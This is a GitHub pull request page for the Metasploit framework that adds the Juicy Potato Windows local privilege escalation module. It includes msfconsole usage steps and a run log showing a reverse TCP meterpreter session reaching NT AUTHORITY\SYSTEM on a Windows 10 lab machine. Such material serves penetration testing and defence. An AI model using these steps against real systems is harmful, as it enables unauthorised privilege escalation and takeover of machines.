
Integrate Juicy Potato Privilege Escalation Exploit #11230

Merged
Merged 14 commits into rapid7:master on Jan 16, 2019

3 participants
@phra
Contributor

phra commented Jan 10, 2019

This PR will:

  • fix #11229
  • make windows/local/ms16_075_reflection obsolete

For more info see:

Tested on:

  • Windows 10 1803

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • Get a meterpreter session with SeImpersonatePrivilege
  • Use windows/local/ms16_075_reflection_juicy
  • Use set PAYLOAD <PAYLOAD>
  • Use set LHOST <LHOST>
  • Use set LPORT <LPORT>
  • Eventually set custom CLSID with set CLSID <CLSID>
  • exploit
  • Receive a session as impersonated user

Example with BITS CLSID (NT AUTHORITY\SYSTEM):


Example with UPNP CLSID (NT AUTHORITY\LOCAL SERVICE):


phra added some commits Jan 10, 2019

@bcoles bcoles added the module label Jan 10, 2019

@phra

Contributor

phra commented Jan 10, 2019

It would be optimal to integrate an additional check regarding the Windows version of the target, which should be < Windows 10 1809 in order to be vulnerable. Any idea how to do it?

Done.

phra added some commits Jan 10, 2019

@phra

Contributor

phra commented Jan 11, 2019

The exploit was updated to spawn a meterpreter as the impersonated user, removing the need for the incognito module.


phra added some commits Jan 12, 2019

@phra

Contributor

phra commented Jan 12, 2019

Added an asciinema as reference.

@busterb

Contributor

busterb commented Jan 15, 2019

msf5 exploit(windows/local/ms16_075_reflection_juicy) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Launching notepad to host the exploit...
[+] Process 4772 launched.
[*] Reflectively injecting the exploit DLL into 4772...
[*] Injecting exploit into 4772...
[*] Exploit injected. Injecting exploit configuration into 4772...
[*] Configuration injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (179779 bytes) to 192.168.56.102
[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.102:49721) at 2019-01-15 13:23:50 -0600

meterpreter > sysinfo
Computer        : DESKTOP-K2I1LJF
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > background 
[*] Backgrounding session 2...
msf5 exploit(windows/local/ms16_075_reflection_juicy) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo 
Computer        : DESKTOP-K2I1LJF
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM

@busterb busterb self-assigned this Jan 15, 2019

@busterb busterb merged commit e69d509 into rapid7:master Jan 16, 2019

3 checks passed:

  • Metasploit Automation - Sanity Test Execution: successfully completed all tests.
  • Metasploit Automation - Test Execution: successfully completed all tests.
  • continuous-integration/travis-ci/pr: the Travis CI build passed.

busterb added a commit that referenced this pull request Jan 16, 2019

@busterb

Contributor

busterb commented Jan 16, 2019

Release Notes

This adds a local privilege escalation exploit 'JuicyPotato', an improvement on ms16_075_reflection that does not require the BITS service to be enabled or port 6666 to be free.

@busterb

Contributor

busterb commented Jan 16, 2019

Thanks @phra

msjenkins-r7 added a commit that referenced this pull request Jan 17, 2019
